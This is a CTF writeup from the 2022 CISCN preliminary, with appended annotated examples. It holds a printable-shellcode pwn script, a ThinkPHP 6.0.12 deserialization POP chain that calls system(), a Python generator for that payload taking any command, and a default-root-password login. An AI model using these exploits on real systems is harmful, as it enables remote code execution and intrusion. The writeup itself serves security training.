2022 CISCN Online Preliminary, Writeups for Selected Challenges, by Xp0int

xp0int, posted on May 30 2022

## 1. PWN

### 1.1 login_normal

`Author: xf1les`

Just find a piece of printable-character shellcode and send it: log in once (opt 1), then deliver the shellcode as the message of a second request (opt 2).

```python
#!/usr/bin/env python3
from pwn import *
import warnings

# pwntools emits BytesWarning when str payloads are passed to send*(); silence it.
warnings.filterwarnings("ignore", category=BytesWarning)
context(arch="amd64")
context(log_level="debug")

p = process("./login")

# Printable-character shellcode: every byte is printable ASCII, so it passes the input filter.
sc = "RXWTYH39Yj0TYfi9XVWAXfi94WWAYjZTYfi9TVWAZjdTYfi9BgWZjmTYfi9ou0t860T88jZTYfi9VU0T8A0t8B0t8F0t8GRAPZ0t8MZRAPZ0t8QZ0t8R0t8SjnXQHszbinzzshRSToRWTnZPP"

# Step 1: log in.
p.sendafter(">>> ", "opt:1\nmsg:ro0tt\n\r\n")
# Step 2: send the shellcode as the message, with a trailing 'P'.
p.sendafter(">>> ", f"opt:2\nmsg:{sc}P\n\r\n")
p.interactive()
```

![title](https://leanote.com/api/file/getImage?fileId=629361acab64412e3e0d7a7a)

## 2. CRYPTO

### 2.1 签到电台 (Check-in Radio Station)

`Author: k1rit0`

Use the codebook to work out the ciphertext that should be sent, then send it; remember to append a `J` at the end. Comparing the three rows below gives the codebook rule: each ciphertext digit is the message digit plus the key digit, mod 10, with no carry.

```python
# Groups kept as digit strings: a leading zero is significant, and 0356 is not a valid Python int literal.
m = ["1732", "2514", "1344", "0356", "0451", "6671", "0055"]  # message
k = ["1061", "7388", "4526", "6188", "9734", "2825", "8555"]  # key
c = ["2793", "9892", "5860", "6434", "9185", "8496", "8500"]  # ciphertext: c[i][j] = (m[i][j] + k[i][j]) % 10
```

```
flag{7523096a-ef01-4c96-822f-5c73a67be852}
```

### 2.2 基于挑战码的双向认证 1 / 2 / 3 (Challenge-Code Based Mutual Authentication)

`Author: k1rit0`

Unintended solution.

1 and 2: go straight to /root/start.sh, find the flag path there, and cat it.

3: even though the permissions had been fixed this time, it was still an unintended solve. A blind `su` with common passwords hit: the root password was the weak default `toor`, which gave a root shell, and the flags were read along the same paths as in 1 and 2.

```
cat /root/cube-shell/instance/flag_server/flag2.txt
1. flag{fff12514-cf56-42f8-99f2-d8a76dc31ea9}
2. flag{34f5fdaf-c373-47fd-afab-01ed2914c11a}
```

### 2.3 ISO9798

`Author: k1rit0`

First a `proof_of_work`; once the brute force is done, a protocol exchange follows. The ciphertext turns out to be made of blocks that have no relation to each other, so the response is not authenticated as a whole and changing the block order passes the check: split the ciphertext into three equal parts, drop the third, swap the first and second, and send that.

No automated flow was written; the steps were done by hand.

```python
from hashlib import sha256
from itertools import product

String = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890abcdefghijklmnopqrstuvwxyz'

def proof_of_work(END, HASH):
    # Find the 4-character prefix x such that sha256(x + END) == HASH.
    for chars in product(String, repeat=4):
        s = ''.join(chars)
        if sha256((s + END).encode()).hexdigest() == HASH:
            print("[+] send:", s)
            return s
    return None

END = 'SsTP3gOuHQLYHDj7'
HASH = 'b89b4829e92d12a713478d186a226dfbce7d73d93916b0d68eca81e3709db401'
print(END, HASH)
proof_of_work(END, HASH)
# flag{ea865268-e711-471e-8080-b41102832ce2}
```
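For 2.3 ISO9798 above: the flow was done by hand on the page, so here is an added example (not code from the original writeup) that automates it. `solve_pow` generalises the page's 4-character brute force to any alphabet and length, and `forge_response` performs the block reordering (split into three equal parts, drop the third, swap the first two). Two things are assumptions not stated on the page: the ciphertext is hex-encoded, and it is built from 16-byte blocks, so the cut points are checked for block alignment before anything would be sent.

```python
# Added example, not from the original writeup: the ISO9798 flow as functions.
# Assumptions: hex-encoded ciphertext, 16-byte blocks (neither stated on the page).
from hashlib import sha256
from itertools import product

ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890abcdefghijklmnopqrstuvwxyz"


def pow_target(prefix: str, suffix: str) -> str:
    """sha256(prefix + suffix) as hex, the value the server compares against."""
    return sha256((prefix + suffix).encode()).hexdigest()


def solve_pow(suffix: str, target: str, alphabet: str = ALPHABET, length: int = 4):
    """Brute-force the unknown prefix of `length` characters; None if nothing matches."""
    for chars in product(alphabet, repeat=length):
        prefix = "".join(chars)
        if pow_target(prefix, suffix) == target:
            return prefix
    return None


def forge_response(ct_hex: str, block_size: int = 16) -> str:
    """Return part2 || part1 of a ciphertext made of three independent thirds."""
    ct = bytes.fromhex(ct_hex)
    if len(ct) == 0 or len(ct) % 3:
        raise ValueError("ciphertext cannot be split into three equal parts")
    third = len(ct) // 3
    if third % block_size:
        # A cut inside a block would not preserve block independence.
        raise ValueError("thirds are not block aligned (block_size=%d)" % block_size)
    p1, p2 = ct[:third], ct[third:2 * third]
    return (p2 + p1).hex()


if __name__ == "__main__":
    # Constructed sample: three distinguishable 16-byte "blocks" (not real server output).
    sample = (b"A" * 16 + b"B" * 16 + b"C" * 16).hex()
    print(forge_response(sample))
    # Small self-check of the PoW solver with a 2-character search space.
    print(solve_pow("x", pow_target("ab", "x"), alphabet="abc", length=2))
```

The alignment check is the practitioner's safeguard: the swap only works because each third is a whole number of cipher blocks with nothing binding them together, and a cut inside a block would corrupt both halves rather than rearrange them.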
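For 2.1 签到电台 above: the page only lists the three rows, so here is an added example (not code from the original writeup) that makes the codebook rule explicit. Every ciphertext digit is (message digit + key digit) mod 10 with no carry, the classic number-station one-time-pad rule; the block encodes, decodes, and checks itself against the page's table. The page says only that a `J` is appended; the space separator between groups used by `send_string` is an assumption.

```python
# Added example, not from the original writeup. Groups are the page's own values;
# the group separator in send_string() is assumed (the page states only the trailing "J").

MESSAGE = ["1732", "2514", "1344", "0356", "0451", "6671", "0055"]
KEY = ["1061", "7388", "4526", "6188", "9734", "2825", "8555"]
CIPHER = ["2793", "9892", "5860", "6434", "9185", "8496", "8500"]


def _check(a: str, b: str) -> None:
    if len(a) != len(b) or not (a.isdigit() and b.isdigit()):
        raise ValueError("groups must be digit strings of equal length")


def add_group(m: str, k: str) -> str:
    """Digit-wise addition mod 10, no carry: the codebook 'encrypt' rule."""
    _check(m, k)
    return "".join(str((int(x) + int(y)) % 10) for x, y in zip(m, k))


def sub_group(c: str, k: str) -> str:
    """Digit-wise subtraction mod 10: recovers the message group from a ciphertext group."""
    _check(c, k)
    return "".join(str((int(x) - int(y)) % 10) for x, y in zip(c, k))


def encode(groups, key):
    """Ciphertext groups for a list of message groups; one key group per message group."""
    if len(groups) != len(key):
        raise ValueError("key must cover every group (one-time pad: no key reuse)")
    return [add_group(m, k) for m, k in zip(groups, key)]


def decode(groups, key):
    """Inverse of encode()."""
    if len(groups) != len(key):
        raise ValueError("key must cover every group")
    return [sub_group(c, k) for c, k in zip(groups, key)]


def send_string(groups, trailer: str = "J", sep: str = " ") -> str:
    """Wire form: groups joined by sep, then the trailer the page says to append."""
    return sep.join(groups) + trailer


if __name__ == "__main__":
    assert encode(MESSAGE, KEY) == CIPHER
    print(send_string(encode(MESSAGE, KEY)))
```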
## 3. WEB

### 3.1 Ezpop

`Author: ABU`

The target runs ThinkPHP 6.0.12. A search turns up a known deserialization (POP chain) vulnerability for this version. /www.zip lets you download the source; auditing it shows the deserialization sink is the /index.php/index.php/test route, which takes its input from a POST parameter.

The PoC found online:

```php
<?php
namespace think {
    abstract class Model {
        // The names and visibility must match the framework's think\Model:
        // serialize() mangles private properties as "\0think\Model\0name"
        // and protected ones as "\0*\0name", and unserialize() only fills
        // the real properties when those prefixes are right.
        private $lazySave = false;
        private $data = [];
        private $exists = false;
        protected $table;
        private $withAttr = [];
        protected $json = [];
        protected $jsonAssoc = false;

        function __construct($obj = '') {
            $this->lazySave = True;
            $this->data = ['whoami' => ['cat /flag.txt']];  // argument handed to the callable
            $this->exists = True;
            $this->table = $obj;                              // inner Pivot object
            $this->withAttr = ['whoami' => ['system']];       // callable applied to the attribute value
            $this->json = ['whoami', ['whoami']];
            $this->jsonAssoc = True;
        }
    }
}

namespace think\model {
    use think\Model;
    class Pivot extends Model {
    }
}

namespace {
    echo(urlencode(serialize(new think\model\Pivot(new think\model\Pivot()))));
}
```

Post the output as the parameter and it fires.

![图片标题](https://leanote.com/api/file/getImage?fileId=62935c7fab64412e450c63a3)

## 4. RE

### 4.1 baby_tree

`Author: JANlittle`

The challenge hands you a Swift syntax tree. Write a few small test programs and run `swiftc -dump-ast test.swift` on them to see what each construct looks like in the dump, then recover the logic:

```python
# Encryption as recovered from the AST dump (Python rendering of the Swift).
# The loop runs for i = 0 .. len(b)-4 inclusive, i.e. range(len(b) - 3); with
# range(len(b) - 4) the last byte would never be touched, and the decryption
# below undoes exactly len(b)-3 steps.
def encrypt(data: bytes, key: bytes) -> bytes:
    b = bytearray(data)
    k = bytearray(key)
    for i in range(len(b) - 3):
        r0, r1, r2, r3 = b[i], b[i + 1], b[i + 2], b[i + 3]
        b[i + 0] = r2 ^ ((k[0] + (r0 >> 4)) & 0xff)
        b[i + 1] = r3 ^ ((k[1] + (r1 >> 2)) & 0xff)
        b[i + 2] = r0 ^ k[2]
        b[i + 3] = r1 ^ k[3]
        k[0], k[1], k[2], k[3] = k[1], k[2], k[3], k[0]  # rotate the 4-byte key left
    return bytes(b)
```

Then just invert it:

```python
enc = [88, 35, 88, 225, 7, 201, 57, 94, 77, 56, 75, 168, 72, 218, 64, 91, 16, 101, 32, 207, 73, 130, 74, 128, 76, 201, 16, 248, 41, 205, 103, 84, 91, 99, 79, 202, 22, 131, 63, 255, 20, 16]
key = list(b'345y')

# Bring the key to the state it had in the last encryption step (len(enc)-4 left rotations).
for i in range(len(enc) - 4):
    key[0], key[1], key[2], key[3] = key[1], key[2], key[3], key[0]

# Walk the steps backwards; each step restores b[i..i+3] and rotates the key right.
for i in range(len(enc) - 4, -1, -1):
    r0 = key[2] ^ enc[i + 2]
    r1 = key[3] ^ enc[i + 3]
    r2 = enc[i + 0] ^ ((key[0] + (r0 >> 4)) & 0xff)
    r3 = enc[i + 1] ^ ((key[1] + (r1 >> 2)) & 0xff)
    enc[i + 0], enc[i + 1], enc[i + 2], enc[i + 3] = r0, r1, r2, r3
    key[1], key[2], key[3], key[0] = key[0], key[1], key[2], key[3]

print(bytes(enc))
```
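For 4.1 baby_tree above: the writeup prints the recovered bytes but never confirms the reconstruction. The following is an added example, not code from the original writeup: the cipher as an encrypt/decrypt pair with the page's key and dump, plus a `recover` function whose result can be re-encrypted and compared against the dumped bytes. That round trip only closes if the forward loop runs for i = 0 .. len-4 inclusive (one step more than a naive `range(len - 4)`), which is the off-by-one that is easy to get wrong when reading the AST.

```python
# Added example, not from the original writeup: encrypt/decrypt pair for the
# recovered baby_tree cipher, with a round-trip check against the dumped bytes.

# Dumped ciphertext and key, as given in the writeup.
ENC = bytes([88, 35, 88, 225, 7, 201, 57, 94, 77, 56, 75, 168, 72, 218, 64, 91,
             16, 101, 32, 207, 73, 130, 74, 128, 76, 201, 16, 248, 41, 205, 103, 84,
             91, 99, 79, 202, 22, 131, 63, 255, 20, 16])
KEY = b"345y"


def rotl(k):
    """Rotate a 4-byte key left by one position (the per-step key schedule)."""
    return k[1:] + k[:1]


def rotr(k):
    """Inverse of rotl()."""
    return k[-1:] + k[:-1]


def encrypt(pt: bytes, key: bytes = KEY) -> bytes:
    b = bytearray(pt)
    k = bytearray(key)
    for i in range(len(b) - 3):  # i = 0 .. len-4 inclusive
        r0, r1, r2, r3 = b[i], b[i + 1], b[i + 2], b[i + 3]
        b[i] = r2 ^ ((k[0] + (r0 >> 4)) & 0xff)
        b[i + 1] = r3 ^ ((k[1] + (r1 >> 2)) & 0xff)
        b[i + 2] = r0 ^ k[2]
        b[i + 3] = r1 ^ k[3]
        k = rotl(k)
    return bytes(b)


def decrypt(ct: bytes, key: bytes = KEY) -> bytes:
    b = bytearray(ct)
    k = bytearray(key)
    for _ in range(len(b) - 4):  # key state used by the final forward step
        k = rotl(k)
    for i in range(len(b) - 4, -1, -1):
        r0 = k[2] ^ b[i + 2]
        r1 = k[3] ^ b[i + 3]
        r2 = b[i] ^ ((k[0] + (r0 >> 4)) & 0xff)
        r3 = b[i + 1] ^ ((k[1] + (r1 >> 2)) & 0xff)
        b[i], b[i + 1], b[i + 2], b[i + 3] = r0, r1, r2, r3
        k = rotr(k)
    return bytes(b)


def recover() -> bytes:
    """Plaintext for the dumped bytes, verified by re-encryption."""
    pt = decrypt(ENC)
    if encrypt(pt) != ENC:
        raise RuntimeError("reconstruction does not round-trip")
    return pt


if __name__ == "__main__":
    print(recover())
```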
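For 3.1 Ezpop above: the PoC is PHP, and the usual pitfall when a POP chain like this is ported or edited by hand is PHP's property-name mangling. The following is an added example, not the writeup's or ThinkPHP's code: a minimal Python emitter for PHP's `serialize()` format that reproduces the PoC's payload, so the `\0think\Model\0` (private) and `\0*\0` (protected) prefixes are visible. It declares only the property subset the PoC declares, not the real framework class; `PhpObject`, `pivot`, `payload` and `urlencoded_payload` are names chosen here.

```python
# Added example, not from the original writeup: PHP serialize() format emitter
# in Python that reproduces the PoC payload. Only the property subset the PoC
# declares is modelled (assumption: this is not the real think\Model class).
import urllib.parse


class PhpObject:
    """A PHP object to serialize: class name plus (name, visibility, declaring class, value)."""

    def __init__(self, cls, props):
        self.cls = cls
        self.props = props

    def mangled(self):
        # serialize() stores private props as "\0Declaring\Class\0name",
        # protected props as "\0*\0name", public props by plain name.
        for name, vis, declared_in, value in self.props:
            if vis == "private":
                yield "\0%s\0%s" % (declared_in, name), value
            elif vis == "protected":
                yield "\0*\0" + name, value
            else:
                yield name, value


def php_serialize(v):
    """Minimal PHP serialize() for bool, int, str, list, dict and PhpObject."""
    if isinstance(v, bool):
        return "b:%d;" % v
    if isinstance(v, int):
        return "i:%d;" % v
    if isinstance(v, str):
        return 's:%d:"%s";' % (len(v.encode()), v)  # length is in bytes, NUL counts as one
    if isinstance(v, list):
        v = dict(enumerate(v))
    if isinstance(v, dict):
        body = "".join(php_serialize(k) + php_serialize(x) for k, x in v.items())
        return "a:%d:{%s}" % (len(v), body)
    if isinstance(v, PhpObject):
        items = list(v.mangled())
        body = "".join(php_serialize(k) + php_serialize(x) for k, x in items)
        return 'O:%d:"%s":%d:{%s}' % (len(v.cls), v.cls, len(items), body)
    raise TypeError("unsupported type: %r" % type(v))


def pivot(table, cmd="cat /flag.txt"):
    """think\\model\\Pivot with the property values the PoC's constructor sets."""
    model = "think\\Model"  # private props are mangled with the declaring class, not Pivot
    return PhpObject("think\\model\\Pivot", [
        ("lazySave", "private", model, True),
        ("data", "private", model, {"whoami": [cmd]}),
        ("exists", "private", model, True),
        ("table", "protected", model, table),
        ("withAttr", "private", model, {"whoami": ["system"]}),
        ("json", "protected", model, ["whoami", ["whoami"]]),
        ("jsonAssoc", "protected", model, True),
    ])


def payload(cmd="cat /flag.txt"):
    """Outer Pivot whose table is an inner Pivot, exactly as the PoC builds it."""
    return php_serialize(pivot(pivot("", cmd), cmd))


def urlencoded_payload(cmd="cat /flag.txt"):
    """quote_plus approximates PHP urlencode() (space becomes '+', NUL becomes %00)."""
    return urllib.parse.quote_plus(payload(cmd))


if __name__ == "__main__":
    print(urlencoded_payload())
```

Two details worth noticing in the output: the private properties carry `think\Model`, the class that declares them, not `think\model\Pivot`, the class being instantiated; and every mangled name starts with a NUL byte, which is why the payload has to be URL-encoded rather than pasted. A payload written with the plain names deserializes without error, but the real properties keep their defaults and the chain never fires.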